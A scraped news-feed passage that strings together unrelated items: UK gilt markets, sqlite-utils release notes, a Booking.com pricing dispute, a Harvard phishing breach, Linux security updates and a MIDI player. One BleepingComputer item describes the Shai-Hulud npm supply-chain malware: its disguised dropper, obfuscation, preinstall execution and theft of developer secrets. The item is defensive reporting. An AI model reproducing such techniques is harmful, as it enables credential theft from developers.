The OBR warns this could make the UK more vulnerable. Overseas investors could readily choose to buy elsewhere. For Reeves, this will be front of mind in keeping the bond market onside.

Graphic

Against this backdrop, Britain’s annual debt interest spending has reached £100bn – representing £1 out of every £10 spent by the Treasury. That is adding to budget pressures as the costs of repairing battered public services and supporting an ageing population mount.

The yield – in effect the interest rate – on 10-year bonds has reached 4.5%, the highest level in the G7. The 30-year is close to its highest point since 1998.

Simon French, the chief economist at Panmure Liberum, says part of Reeves’s strategy is to coax yields back down to shrink this interest bill. Getting Britain back to the middle of the pack could be worth billions of pounds a year.

“Comparing the UK to the G7 is like saying who is the most drunk at the party. [But] it’s a pretty heavy inroad into your fiscal gap. That is the opportunity.”

There could be a “dullness dividend” from getting interest rates down, he says, the opposite of the “ moron premium ” under Truss. “Avoid self-harm, and there’s a rally.”

To do so, Reeves will be required to tackle inflation at the same time as filling a potential £20bn budget shortfall . Raising taxes and cutting spending could make that tougher – especially without crushing economic growth, or breaking Labour’s manifesto promises.

Graphic

How much more debt investors will be asked to stomach will be a key budget moment. The City is looking for Reeves to rebuild a hefty margin of headroom against her fiscal rules. That would limit the deficit, and with it future gilt auctions.

“You’re waiting for the mic drop on the current budget rule. That’s what we’re looking for,” says Moyeen Islam, the head of UK rates strategy at Barclays.

In the spring, Reeves left £9.9bn in reserve as a buffer. But this is expected to have been more than demolished by higher borrowing costs, welfare U-turns, and a downgraded OBR productivity forecast.

Investors are hoping for a figure above £20bn, he says. “That would be very gilt positive.”

However, a political strategy centred on pleasing City financiers is not entirely comfortable territory for Labour, especially when many of those investors want Reeves to get a grip on rising welfare spending .

Geoff Tily, senior economist at the Trades Union Congress, says the City backed the Tories’ 2010s austerity drive. “That damaged, rather than repaired, the public debt.

“Our view is that markets are not always rational. But markets do care about growth. And there is evidence that they would look favourably on policies that set the economy on a better course.”

Investors had been led to expect a manifesto-busting income tax rise. Doing so would be the simplest way to raise billions for the exchequer, rather than through a smorgasbord of smaller measures that could be tricky to implement.

“We had underestimated how difficult a choice that is, and how high that hurdle [a manifesto breach] is for a chancellor – any chancellor,” says Islam.

Perversely, this could smooth Wednesday’s reaction, as many investors fear Reeves being ejected from No 11. “The market has learned that sometimes those decisions are more complex and more nuanced than perhaps we had thought.”

graphic

On Panmure Liberum’s trading floor, Marco Varani still predicts choppy trading conditions.

“What you really crave in this industry is movement, volatility. There is more business. Days like Brexit and the first days of Covid, that’s like when it’s peak frenzy. I mean, it was utter carnage.”

As soon as the Bloomberg headlines on Reeves’s speech land, the head of retail trading expects a rapid reaction. “You can see the gilt market got a little bit nervous with the flip-flopping around. There will be a lot of volatility.”

During the speech, the first gilt moves, currency swings and shifts in UK-listed company shares are expected to be mostly driven by “fast money” – the City slang for hedge funds.

Their involvement in the gilt market has doubled from 15% of trades in 2018 to roughly 30% , according to the Bank of England. Much of this is driven by borrowing-fuelled bets among a small number of firms.

However, the ultimate verdict could take several days. How Threadneedle Street proceeds with its interest-rate cutting path – expected weeks later on 18 December – is key. As will be Britain’s growth trajectory and global conditions.

Anthony O’Brien, the head of market strategy at Phoenix Group, says: “The market’s interpretation on day one should never be seen as ‘that’s what the market’s telling you’. To a large extent it is just people who are caught offside. And perhaps it does take a few more days afterwards.

“Ultimately it is economics which drives the valuation for gilts. We need to concentrate on inflation coming down. Let’s just get this uncertainty out of the way.”

sqlite-utils 4.0a1 has several (minor) backwards incompatible changes

Simon Willison
simonwillison.net
2025-11-24 14:52:34
I released a new alpha version of sqlite-utils last night - the 128th release of that package since I started building it back in 2018. sqlite-utils is two things in one package: a Python library for conveniently creating and manipulating SQLite databases and a CLI tool for working with them in the ...
Original Article

24th November 2025

I released a new alpha version of sqlite-utils last night—the 128th release of that package since I started building it back in 2018.

sqlite-utils is two things in one package: a Python library for conveniently creating and manipulating SQLite databases and a CLI tool for working with them in the terminal. Almost every feature provided by the package is available via both of those surfaces.

This is hopefully the last alpha before a 4.0 stable release. I use semantic versioning for this library, so the 4.0 version number indicates that there are backward incompatible changes that may affect code written against the 3.x line.

These changes are mostly very minor: I don’t want to break any existing code if I can avoid it. I made it all the way to version 3.38 before I had to ship a major release and I’m sad I couldn’t push that even further!

Here are the annotated release notes for 4.0a1.

  • Breaking change : The db.table(table_name) method now only works with tables. To access a SQL view use db.view(view_name) instead. ( #657 )

This change is for type hint enthusiasts. The Python library used to encourage accessing both SQL tables and SQL views through the db["name_of_table_or_view"] syntactic sugar—but tables and view have different interfaces since there’s no way to handle a .insert(row) on a SQLite view. If you want clean type hints for your code you can now use the db.table(table_name) and db.view(view_name) methods instead.

  • The table.insert_all() and table.upsert_all() methods can now accept an iterator of lists or tuples as an alternative to dictionaries. The first item should be a list/tuple of column names. See Inserting data from a list or tuple iterator for details. ( #672 )

A new feature, not a breaking change. I realized that supporting a stream of lists or tuples as an option for populating large tables would be a neat optimization over always dealing with dictionaries each of which duplicated the column names.

I had the idea for this one while walking the dog and built the first prototype by prompting Claude Code for web on my phone. Here’s the prompt I used and the prototype report it created , which included a benchmark estimating how much of a performance boost could be had for different sizes of tables.

  • Breaking change : The default floating point column type has been changed from FLOAT to REAL , which is the correct SQLite type for floating point values. This affects auto-detected columns when inserting data. ( #645 )

I was horrified to discover a while ago that I’d been creating SQLite columns called FLOAT but the correct type to use was REAL! This change fixes that. Previously the fix was to ask for tables to be created in strict mode.

  • Now uses pyproject.toml in place of setup.py for packaging. ( #675 )

As part of this I also figured out recipes for using uv as a development environment for the package, which are now baked into the Justfile .

  • Tables in the Python API now do a much better job of remembering the primary key and other schema details from when they were first created. ( #655 )

This one is best explained in the issue .

  • Breaking change : The table.convert() and sqlite-utils convert mechanisms no longer skip values that evaluate to False . Previously the --skip-false option was needed, this has been removed. ( #542 )

Another change which I would have made earlier but, since it introduces a minor behavior change to an existing feature, I reserved it for the 4.0 release.

  • Breaking change : Tables created by this library now wrap table and column names in "double-quotes" in the schema. Previously they would use [square-braces] . ( #677 )

Back in 2018 when I started this project I was new to working in-depth with SQLite and incorrectly concluded that the correct way to create tables and columns named after reserved words was like this:

create table [my table] (
  [id] integer primary key,
  [key] text
)

That turned out to be a non-standard SQL syntax which the SQLite documentation describes like this :

A keyword enclosed in square brackets is an identifier. This is not standard SQL. This quoting mechanism is used by MS Access and SQL Server and is included in SQLite for compatibility.

Unfortunately I baked it into the library early on and it’s been polluting the world with weirdly escaped table and column names ever since!

I’ve finally fixed that, with the help of Claude Code which took on the mind-numbing task of updating hundreds of existing tests that asserted against the generated schemas.

The above example table schema now looks like this:

create table "my table" (
  "id" integer primary key,
  "key" text
)

This may seem like a pretty small change but I expect it to cause a fair amount of downstream pain purely in terms of updating tests that work against tables created by sqlite-utils !

  • The --functions CLI argument now accepts a path to a Python file in addition to accepting a string full of Python code. It can also now be specified multiple times. ( #659 )

I made this change first in LLM and decided to bring it to sqlite-utils for consistency between the two tools.

  • Breaking change: Type detection is now the default behavior for the insert and upsert CLI commands when importing CSV or TSV data. Previously all columns were treated as TEXT unless the --detect-types flag was passed. Use the new --no-detect-types flag to restore the old behavior. The SQLITE_UTILS_DETECT_TYPES environment variable has been removed. ( #679 )

One last minor ugliness that I waited for a major version bump to fix.

Booking.com cancels $4K hotel reservation, offers same rooms again for $17K

Hacker News
www.cbc.ca
2025-11-24 14:43:01
Comments...
Original Article

When Erika Mann booked a hotel for the 2026 Formula One Grand Prix in Montreal, she played it safe.

Her relatives were flying in from the Netherlands to watch the races with her, and Mann, who lives in Oakville, Ont., wanted to make sure their accommodations were locked in.

On May 25, she booked a four-room unit on Booking.com at Montreal's Holland Hotel, steps from the heart of race-weekend action. Price tag: $4,300. "I was super excited and yeah, jumped right on it," Mann told Go Public.

But weeks after her reservation was confirmed, her excitement ended. Mann says both the hotel and Booking.com told her the price was a mistake — and if she still wanted the unit for May 22-24, 2026 she'd need to cough up four times the amount — more than $17,000.

"That was just so outstandingly outrageous that I almost couldn't believe it," she told Go Public.

Digital rights expert David Fewer says shocks like this are becoming more common as online travel sites and hotels rely on automated booking and pricing systems.

He says Booking.com's policies allow confirmed reservations to be cancelled if the company decides the original rate was an error, leaving consumers exposed — especially when prices surge during big events, a practice known as event pricing.

"She'd done the research, she'd found the deal … and she'd booked it and thought she was done, and she was not," said Fewer, who directs the Samuelson-Glushko Canadian Internet Policy and Public Interest Clinic (CIPPIC) at the University of Ottawa.

"It's a weak position … our consumer protection laws are not great."

'Everything about this felt off'

When Mann booked the accommodations, Formula One organizers hadn't locked in the exact race dates. So she covered her bases — reserving the same four-bedroom unit for two possible weekends in May 2026, both with free cancella tion.

Once the official dates were announced, she cancelled the extra booking, in line with Booking.com rules.

Mann says she first heard there was a problem weeks later on June 27, when the hotel called her saying the price was wrong and she needed to cancel or pay the new rate.

She contacted Booking.com, which gave her two choices: Cancel the reservation herself or pay that new sky-high rate for the same unit on the same dates.

When she refused and demanded to keep her original booking, the website cancelled it.

At this point, Mann says flights were already booked, and accommodation prices in Montreal were rising quickly.

"It felt like they were running out the clock," she said.

Despite her efforts, nothing changed.

"It felt like Groundhog Day, to be honest,” she said. “Every time it was the same thing. You call in, you're on an immense hold, you talk to someone, you tell the whole story over again.”

A hotel building in Montreal
The Holland Hotel by Simplissimmo is at the heart of Montreal, close to tourist hot spots, and the Formula One Grand Prix events. (Charles Contant/CBC)

Hotel blames pricing glitch

The Holland Hotel where Mann had booked, told Go Public a "synchronization error" with Booking.com caused the issue, allowing non-event pricing to briefly appear for two units at the property. When they did, the hotel says Mann booked one of them.

It said an automated software updates prices through Booking.com's system — which means the hotel can't manually override the rates shown on the platform.

The hotel says that when Formula One organizers confirmed in 2024 that the 2026 Montreal Grand Prix would take place on the third or fourth weekend of May, the system should have automatically adjusted those dates to “event pricing.”

A formula one car races so fast it blurs crowd
Mercedes driver George Russell, of the United Kingdom, drives during Formula One auto racing action at the Canadian Grand Prix in Montreal on June 15. (Christopher Katsarov/The Canadian Press)

Booking.com says the hotel asked them to review the case. The site sided with the property after it reported the posted rate was an error.

Mann says Booking.com did offer alternative accommodations for roughly what she paid — but none were remotely equivalent and would have meant squeezing her in with her adult step brother, step sister and partner, plus her 24-year-old son and husband.

"One was a single-room studio with two beds," she said. "Another had one bathroom. We're a group of adults, not backpackers."

Fine-print pitfall

Booking.com's terms note that “Obvious errors and obvious misprints are not binding. For example, if you book a premium c ar or a night in a luxury suite mistakenly offered for $1, your booking may be cancelled, and we'll refund anything you've paid."

The hotel told Go Public it was this Booking.com rule that allowed Mann's reservation to be cancelled, and noted that "nothing about this case is unusual."

It says rates are always higher during the Grand Prix, and the increased prices were a "consistent and a well-known market reality" during the event.

A man stands in front of greenery smiling in glasses
Digital law expert David Fewer says booking platforms offer few protections to users and consumer protection laws are lacking. (Naomi Fewer)

Fewer isn't convinced.

"It's not like they missed the decimal point, right? They gave you the hotel for a buck instead of a thousand bucks. This is something else,” Fewer said. “This is where I think consumers should get the benefit.”

He says the bigger problem is that travellers are often left to fend for themselves, noting that many booking platforms have policies that don’t protect customers, and consumer protection laws haven't caught up.

"What we need is a consumer protection statute," he said. "Especially for these kinds of things like surge pricing or after-the-fact event pricing … consumers get the benefit of the deal that they found."

Booking.com takes action — after Go Public inquires

After Go Public contacted Booking.com, the company took another look at Mann's case.

In a written statement, it said the hotel requested the cancellation.

WATCH | Booking.com is one of the biggest online travel agencies:

Booking.com cancels $4K reservation, offers to rebook for $17K | Go Public

An Ontario woman booked a $4,300 hotel for the 2026 Montreal Grand Prix, but Booking.com cancelled it and offered her the same rooms on the same dates for more than $17,000. A digital rights lawyer told CBC Go Public the situation is an example of how automated pricing and weak protections can leave travellers exposed.

"Our procedures do allow for cancellations in limited circumstances where a genuine rate mistake has occurred," Booking.com wrote to Go Public. "That being said, we recognize that communication to the customer fell short of our usual standards."

The company says the cancellation was approved under its standard policy permitting properties to void bookings in "rare cases where a property identifies a clear rate error."

Following Go Public's questions, Booking.com told Mann it would honour her original booking and cover the price difference — allowing her to keep the same four bedroom unit at no additional cost.

Mann says she's relieved, but says getting help shouldn't require contacting the media.

"You're basically left holding an empty bag and have no power."

How Canadians can protect themselves

Fewer says travellers booking accommodations during major events should take the following steps to protect themselves:

  • Taking screenshots during the booking including numbers and prices.
  • Calling hotels directly to confirm the reservation rate.
  • Using credit cards with strong dispute policies.

"You need to protect yourself the way you would with any contract," he said.

Mann says she did everything right — booked early and documented everything — and still ended up fighting for almost two months to get what she paid for.

"I've used Booking.com for so many other trips and travels, but to me, when this sort of thing happens," she said, "You lose faith.

Submit your story ideas

Go Public is an investigative news segment on CBC-TV, radio and the web.

We tell your stories, shed light on wrongdoing and hold the powers that be accountable.

If you have a story in the public interest, or if you're an insider with information, contact gopublic@cbc.ca with your name, contact information and a brief summary. All emails are confidential until you decide to Go Public.

Read more stories by Go Public.

Read about our hosts.

Shai-Hulud malware infects 500 npm packages, leaks secrets on GitHub

Bleeping Computer
www.bleepingcomputer.com
2025-11-24 14:32:40
Hundreds of trojanized versions of well-known packages such as Zapier, ENS Domains, PostHog, and Postman have been planted in the npm registry in a new Shai-Hulud supply-chain campaign. [...]...
Original Article

Shai-Hulud malware infects 500 npm packages, leaks secrets on GitHub

Hundreds of trojanized versions of well-known packages such as Zapier, ENS Domains, PostHog, and Postman have been planted in the npm registry in a new Shai-Hulud supply-chain campaign.

The malicious packages have been added to NPM (Node Package Manager) over the weekend to steal developer and continuous integration and continuous delivery (CI/CD) secrets. The data is automatically posted on GitHub in encoded form.

At publishing time, GitHub returned 27,600 results corresponding to entries related to the recent attack.

Wiz

GitHub repositories with secrets stolen in the new Shai-Hulud campaign
GitHub repositories with secrets stolen in the new Shai-Hulud campaign
source: BleepingComputer

When the Shai-Hulud malware first appeared in the npm space in mid-September, and it compromised 187 packages with a self-propagating payload that used the TruffleHog tool to steal developer secrets.

The threat actor automatically downloaded legitimate packages, modified the package.json file to inject a malicious script, and then published them on npm using compromised maintainer accounts.

When Charlie Eriksen, malware researcher at developer-focused security platform Aikido Security, discovered the new campaign earlier today, there were 105 trojanized packages with Shai-Hulud indicators. Since then, the number grew to 492, some of them with multiple versions.

Later, the researcher warned that the secrets stolen in the supply-chain attack were leaked on GitHub.

However, the campaign has grown exponentially to more than 27,000 malicious packages. Threat researchers at Wiz cloud security platform discovered around 350 unique maintainer accounts used in the campaign, noting that " 1,000 new repositories are being added consistently every 30 minutes in the last couple of hours."

Eriksen clarified for BleepingComputer that the repositories on GitHub are indicative of compromised developers that used trojanized npm packages and thad GitHub credentials on their environment.

A technical analysis of the new Shai-Hulud malware analysis from CI/CD security company Step Security explains that the new payloads are present in two files, one being setup_bun.js - a dropper disguised as a Bun installer.

The second file is called bun_environment.js and is sizeable at 10MB. It relies on "extreme obfuscation techniques," Step Security says, such as a large hex-encoded string with thousands of entries, an anti-analysis loop, and an obfuscated function to retrieve every string in the code.

According to Wiz, the malicious code collects developer and CI/CD secrets and publishes them to GitHub repositories "with names referencing Shai-Hulud." The malicious code executes only during the pre-install stage and creates the following files:

  • cloud.json
  • contents.json
  • environment.json
  • truffleSecrets.json

Stolen secrets are published on GitHub to automatically-generated repositories that have the description "Sha1-Hulud: The Second Coming."

It appears that the threat actor has also gained access to GitHub accounts that they are now using to create repositories with the four files above.

GitHub accounts hosting repos from the Shai-Hulud campaign
source: BleepingComputer

GitHub is deleting the attacker’s repositories as they emerge, but the threat actor appears to be creating new ones very fast.

On the list of 186 packages that Aikido Security found to be compromised with a new version of the Shai Hulud malware, there are multiple packages from Zapier, ENS Domains, PostHog, and AsyncAPI.

The compromised Zapier packages constitute the official toolkit for building Zapier integrations and are essential for Zapier developers.

The EnsDomains packages are tools and libraries widely used by wallets, DApps, exchanges, and the ENS Manager app, to handle .eth names, resolving them to Ethereum addresses, linking IPFS content, validating names, and interacting with the official ENS smart contracts.

All of the compromised packages are available for download from npm. However, in some cases, the platform displays a warning message about unauthorized publication of the latest version, indicating that the automated review has caught signs of a compromise.

Warning message on npm
Warning message on npm
Source: BleepingComputer

Developers are advised to check Aikido’s post for the complete list of the infected packages, downgrade to safe versions, and rotate their secrets and CI/CD tokens immediately.

Wiz researchers recommend security teams to first identify the compromised packages and replace them with legitimate ones. They also urge organizations to rotate all credentials tied to npm, GitHub, and cloud providers.

Aikido Security advises developers to disable npm postinstall scripts during continuous integration, if possible.

The return of Shai Hulud comes at a time when GitHub introduced additional security measures to prevent supply-chain attacks on npm, following a series of high-impact attacks on the platform. However, the measures are being implemented gradually.

Wiz

The 2026 CISO Budget Benchmark

It's budget season! Over 300 CISOs and security leaders have shared how they're planning, spending, and prioritizing for the year ahead. This report compiles their insights, allowing readers to benchmark strategies, identify emerging trends, and compare their priorities as they head into 2026.

Learn how top leaders are turning investment into measurable impact.

Sorry Chi, Hello Julia?

hellgate
hellgatenyc.com
2025-11-24 14:14:59
And more stories to kick off your holiday week....
Original Article
Sorry Chi, Hello Julia?
Councilmember Chi Ossé wields a bullhorn in support of his bill banning forced broker fees (Emil Cohen / NYC Council Media Unit)

Morning Spew

Scott's Picks:

Give us your email to read the full story

Sign up now for our free newsletters.

Sign up

Great! You’ve successfully signed up.

Welcome back! You've successfully signed in.

You've successfully subscribed to Hell Gate.

Your link has expired.

Success! Check your email for magic link to sign-in.

Success! Your billing info has been updated.

Your billing was not updated.

Three stable kernel updates, two french hens, ...

Linux Weekly News
lwn.net
2025-11-24 14:11:01
Greg Kroah-Hartman has announced the release of the 6.17.9, 6.12.59, and 6.6.117 stable kernels. As usual, he advises users of stable kernels to upgrade. ...
Original Article

[Posted November 24, 2025 by daroc]

Greg Kroah-Hartman has announced the release of the 6.17.9 , 6.12.59 , and 6.6.117 stable kernels. As usual, he advises users of stable kernels to upgrade.



Harvard University discloses data breach affecting alumni, donors

Bleeping Computer
www.bleepingcomputer.com
2025-11-24 14:06:36
Harvard University disclosed over the weekend that its Alumni Affairs and Development systems were compromised in a voice phishing attack, exposing the personal information of students, alumni, donors, staff, and faculty members. [...]...
Original Article

Harvard

Harvard University disclosed over the weekend that its Alumni Affairs and Development systems were compromised in a voice phishing attack, exposing the personal information of students, alumni, donors, staff, and faculty members.

The exposed data includes email addresses, telephone numbers, home and business addresses, event attendance records, donation details, and "biographical information pertaining to University fundraising and alumni engagement activities."

However, according to Klara Jelinkova, Harvard's Vice President and University Chief Information Officer, and Jim Husson, the university's Vice President for Alumni Affairs and Development, the compromised IT systems didn't contain Social Security numbers, passwords, payment card information, or financial info.

Wiz

Harvard officials believe that the following groups and individuals had their data exposed in the data breach:

  • Alumni
  • Alumni spouses, partners, and widows/widowers of alumni
  • Donors to Harvard University
  • Parents of current and former students
  • Some current students
  • Some faculty and staff

The private Ivy League research university is working with law enforcement and third-party cybersecurity experts to investigate the incident, and it has sent data breach notifications on November 22nd to individuals whose information may have been accessed in the attack.

"On Tuesday, November 18, 2025, Harvard University discovered that information systems used by Alumni Affairs and Development were accessed by an unauthorized party as a result of a phone-based phishing attack," the letters warn .

"The University acted immediately to remove the attacker's access to our systems and prevent further unauthorized access. We are writing to make you aware that information about you may have been accessed and so you can be alert for any unusual communications that purport to come from the University."

The university also urged potentially affected individuals to be suspicious of calls, text messages, or emails claiming to be from the university, particularly those requesting password resets or sensitive information (e.g., passwords, Social Security numbers, or bank information).

A Harvard spokesperson was not immediately available for comment when contacted by BleepingComputer earlier today.

In mid-October, Harvard University also told BleepingComputer that it was investigating another data breach after the Clop ransomware gang added it to its data-leak extortion site, claiming it had breached the school's systems using a zero-day vulnerability in Oracle's E-Business Suite servers.

Two other Ivy League schools, Princeton University and the University of Pennsylvania , disclosed data breaches earlier this month, both confirming that attackers gained access to donors' information.

Wiz

7 Security Best Practices for MCP

As MCP (Model Context Protocol) becomes the standard for connecting LLMs to tools and data, security teams are moving fast to keep these new services safe.

This free cheat sheet outlines 7 best practices you can start using today.

Security updates for Monday

Linux Weekly News
lwn.net
2025-11-24 14:05:35
Security updates have been issued by Fedora (calibre, chromium, cri-o1.32, cri-o1.33, cri-o1.34, dotnet10.0, dovecot, gnutls, gopass, gopass-hibp, gopass-jsonapi, kubernetes1.31, kubernetes1.32, kubernetes1.33, kubernetes1.34, and linux-firmware), Mageia (ffmpeg, kernel, kmod-xtables-addons & km...
Original Article
Dist. ID Release Package Date
Fedora FEDORA-2025-355be35bb1 F43 calibre 2025-11-24
Fedora FEDORA-2025-d41f5f4a2a F43 chromium 2025-11-24
Fedora FEDORA-2025-8c88aa0c74 F41 cri-o1.32 2025-11-22
Fedora FEDORA-2025-91677b56d4 F42 cri-o1.32 2025-11-22
Fedora FEDORA-2025-a246780676 F43 cri-o1.32 2025-11-22
Fedora FEDORA-2025-b339c2eaad F43 cri-o1.33 2025-11-22
Fedora FEDORA-2025-8bd0d993db F41 cri-o1.34 2025-11-22
Fedora FEDORA-2025-1e7710541e F42 cri-o1.34 2025-11-22
Fedora FEDORA-2025-723e0fd8bd F43 cri-o1.34 2025-11-22
Fedora FEDORA-2025-969f0c8c1e F41 dotnet10.0 2025-11-22
Fedora FEDORA-2025-aaa5764dc9 F42 dotnet10.0 2025-11-22
Fedora FEDORA-2025-41518fc0fd F43 dotnet10.0 2025-11-22
Fedora FEDORA-2025-e491c93405 F43 dovecot 2025-11-22
Fedora FEDORA-2025-45b1844342 F43 gnutls 2025-11-23
Fedora FEDORA-2025-817b0dc707 F43 gopass 2025-11-22
Fedora FEDORA-2025-b3bd444d1f F41 gopass-hibp 2025-11-22
Fedora FEDORA-2025-d4a04dda81 F43 gopass-jsonapi 2025-11-22
Fedora FEDORA-2025-d9389fc692 F41 kubernetes1.31 2025-11-22
Fedora FEDORA-2025-4a1370ea1b F42 kubernetes1.31 2025-11-22
Fedora FEDORA-2025-5a4555eabc F43 kubernetes1.31 2025-11-22
Fedora FEDORA-2025-547f14aef4 F41 kubernetes1.32 2025-11-23
Fedora FEDORA-2025-0131063534 F42 kubernetes1.32 2025-11-22
Fedora FEDORA-2025-00368e9022 F43 kubernetes1.32 2025-11-22
Fedora FEDORA-2025-298add9246 F43 kubernetes1.33 2025-11-24
Fedora FEDORA-2025-f32b1debd8 F43 kubernetes1.34 2025-11-24
Fedora FEDORA-2025-ecd9a3485b F42 linux-firmware 2025-11-22
Fedora FEDORA-2025-0ef7552461 F43 linux-firmware 2025-11-22
Mageia MGASA-2025-0306 9 ffmpeg 2025-11-21
Mageia MGASA-2025-0309 9 kernel, kmod-xtables-addons & kmod-virtualbox 2025-11-22
Mageia MGASA-2025-0310 9 kernel-linus 2025-11-22
Mageia MGASA-2025-0308 9 konsole 2025-11-21
Mageia MGASA-2025-0307 9 redis 2025-11-21
Red Hat RHSA-2025:0039-01 EL6 bind and bind-dyndb-ldap 2025-11-24
Red Hat RHSA-2025:21926-01 EL9 kernel 2025-11-24
SUSE openSUSE-SU-2025:15752-1 TW act 2025-11-22
SUSE openSUSE-SU-2025-20073-1 oS16.0 alloy 2025-11-21
SUSE SUSE-SU-2025:4191-1 MP4.2 MP4.3 SLE15 oS15.6 amazon-ssm-agent 2025-11-24
SUSE openSUSE-SU-2025:15753-1 TW ansible-12 2025-11-22
SUSE openSUSE-SU-2025:15754-1 TW ansible-core 2025-11-22
SUSE openSUSE-SU-2025:15756-1 TW blender 2025-11-22
SUSE openSUSE-SU-2025:15755-1 TW blender 2025-11-22
SUSE openSUSE-SU-2025-20076-1 oS16.0 chromium 2025-11-21
SUSE SUSE-SU-2025:4158-1 SLE15 oS15.6 cups-filters 2025-11-21
SUSE SUSE-SU-2025:4180-1 SLE-m5.2 curl 2025-11-24
SUSE openSUSE-SU-2025:15757-1 TW curl 2025-11-22
SUSE SUSE-SU-2025:4092-1 MP4.3 SLE15 SLE-m5.3 SLE-m5.4 SLE-m5.5 oS15.4 oS15.6 elfutils 2025-11-24
SUSE openSUSE-SU-2025-20055-1 oS16.0 expat 2025-11-21
SUSE SUSE-SU-2025:4174-1 SLE12 firefox 2025-11-24
SUSE SUSE-SU-2025:4173-1 SLE15 SES7.1 oS15.6 firefox 2025-11-24
SUSE openSUSE-SU-2025-20065-1 oS16.0 firefox 2025-11-21
SUSE SUSE-SU-2025:4186-1 SLE-m5.2 glib2 2025-11-24
SUSE SUSE-SU-2025:4197-1 SLE12 grub2 2025-11-24
SUSE SUSE-SU-2025:4196-1 SLE15 oS15.6 grub2 2025-11-24
SUSE openSUSE-SU-2025:15749-1 TW grub2 2025-11-22
SUSE SUSE-SU-2025:4190-1 SLE15 SLE-m5.5 SES7.1 oS15.6 helm 2025-11-24
SUSE SUSE-SU-2025:4188-1 MP4.2 SLE15 SLE-m5.1 SLE-m5.2 SES7.1 oS15.3 kernel 2025-11-24
SUSE SUSE-SU-2025:4189-1 SLE12 kernel 2025-11-24
SUSE openSUSE-SU-2025:15751-1 TW libipa_hbac-devel 2025-11-22
SUSE openSUSE-SU-2025-20050-1 oS16.0 libxslt 2025-11-21
SUSE SUSE-SU-2025:4187-1 SLE15 SES7.1 oS15.6 nvidia-container-toolkit 2025-11-24
SUSE openSUSE-SU-2025-20059-1 oS16.0 ongres-scram 2025-11-21
SUSE openSUSE-SU-2025-20056-1 oS16.0 openexr 2025-11-21
SUSE SUSE-SU-2025:4156-1 SLE15 SLE-m5.2 SES7.1 oS15.3 podman 2025-11-21
SUSE SUSE-SU-2025:4157-1 SLE15 SLE-m5.3 SLE-m5.4 oS15.4 podman 2025-11-21
SUSE SUSE-SU-2025:4185-1 SLE15 SLE-m5.5 oS15.5 oS15.6 podman 2025-11-24
SUSE openSUSE-SU-2025-20068-1 oS16.0 poppler 2025-11-21
SUSE SUSE-SU-2025:4073-2 SLE15 runc 2025-11-24
SUSE openSUSE-SU-2025-20072-1 oS16.0 runc 2025-11-21
SUSE openSUSE-SU-2025-20048-1 oS16.0 samba 2025-11-21
SUSE SUSE-SU-2025:4181-1 MP4.3 SLE15 SLE-m5.3 SLE-m5.4 oS15.4 sssd 2025-11-24
SUSE SUSE-SU-2025:4183-1 SLE15 sssd 2025-11-24
SUSE SUSE-SU-2025:4182-1 SLE15 SLE-m5.5 oS15.5 sssd 2025-11-24
SUSE SUSE-SU-2025:4195-1 SLE15 oS15.6 thunderbird 2025-11-24
SUSE SUSE-SU-2025:4184-1 SLE12 tomcat 2025-11-24
SUSE SUSE-SU-2025:4159-1 SLE15 SES7.1 oS15.6 tomcat 2025-11-21
Ubuntu USN-7878-2 25.04 cups-filters 2025-11-24
Ubuntu USN-7879-1 24.04 25.04 linux, linux-aws, linux-gcp, linux-hwe-6.14, linux-oracle, linux-realtime 2025-11-21
Ubuntu USN-7880-1 24.04 linux-oem-6.14 2025-11-21
Ubuntu USN-7879-2 24.04 linux-realtime-6.14 2025-11-21

Show HN: Cynthia – Reliably play MIDI music files – MIT / Portable / Windows

Hacker News
www.blaizenterprises.com
2025-11-24 13:58:05
Comments...
Original Article

Reliably play midi music files from a folder or ".m3u" play list. Adjust playback speed, volume and output device on-the-fly during playback. A large playback progress bar makes jumping forward and backward in time a breeze with just a single click or tap. Supports ".mid", ".midi" and ".rmi" files in format 0 (single track) and format 1 (multi-track). Comes complete with 25 sample midis ready to play.

Cynthia playing through her sample midi music

Features

  • Dual play systems - Play Folder and Play List
  • Comes with 25 built-in sample midis on a virtual disk
  • Elapsed, Remaining and Total time readouts
  • Device Status, Device Count, Msgs/sec and Data Rate readouts
  • Native ".m3u" playlist support (copy, paste, open, save, build)
  • Drag and drop midi files to play/add to playlist
  • Play Modes: Once, Repeat One, Repeat All, All Once, Random
  • Standard Play Speed Range: 50% to 200% (0.5x to 2x)
  • Extended Play Speed Range: 10% to 1,000% (0.1x to 10x)
  • Intro Mode: Play first 2s, 5s, 10s or 30s of midi
  • Rewind/Fast Forward by: 1s, 2s, 5s, 10s or 30s
  • Play on Start option - playback commences on app start
  • Always on Midi option - maintain connection to midi device(s) for instant playback
  • Auto Fade In - eliminate loud or abrupt notes during rewind, fast forward or reposition operations
  • Playback Progress bar - click to reposition/jump backward or forward in time
  • Volume control with volume boost (up to 200%)
  • " Mixer" link - display Windows "Volume Mixer" app
  • Play ".mid", ".midi" and ".rmi" midi files in 0 and 1 formats
  • Scrolling lyrics viewer
  • Detailed midi information panel
  • Tracks Panel: Realtime track data indicators, display flat or shaded, with mute all, unmute all, and mute individual track options
  • Channels Panel: Realtime channel output volume indicators with peak level hold and variable hold time, display flat or shaded, unmute all, mute all, and mute individual channel options
  • Mixer: Adjust individual channel volume levels from 0% to 200%
  • Option: Number channels 0-15 or 1-16
  • Notes Panel: 128 realtime note usage indicators with variable hold time, 8-12 notes per line, labels as letters or numbers, display flat or shaded, unmute all, mute all, and mute individual note options
  • Option: Number notes 0-127 or 1-128
  • Piano Panel: View realtime piano keystrokes on a 128, 88, 76, 61, 54, 49 or 37 key keyboard
  • Piano Keystroke Illumination: Off, Flat, Shade Up, Shade Down, Subtle, Subtle 2, Leading Edge, and Leading Edge 2
  • Piano: Mark middle C key, C + F keys, or all white keys
  • Volume Bars: Realtime average volume and bass volume levels (left and right vertical)
  • Transpose option: Shift all notes up/down music scale
  • Use an Xbox Controller to control Cynthia's main functions: Playback speed, volume, song position, display panels, song file navigation, jump to start of song, toggle fullscreen mode, etc
  • Large list capacity for handling thousands of midi files
  • Switch between up to 10 midi playback devices
  • Supports playback through a single midi device, or multiple simultaneous midi devices
  • Multi-Device Options (per midi device): Time Shift - adjust playback timing to compensate for midi device lag from -500 ms to +500 ms, Device Volume - adjust output volume from 0% to 200%, Output Channels - select which midi channels to play through the device
  • Automatic Midi Device(s) Resync - detects OS changes in midi device ordering/names and corrects in realtime
  • Custom built midi playback engine for high playback stability
  • Automatic compact mode for display on small/low resolution screens
  • Simple and easy to use
  • Options Window - Easily change app color, font, and settings
  • Portable
  • Smart Source Code (Borland Delphi 3 and Lazarus 2)

Information

App Name

Cynthia

Version

1.0.6062

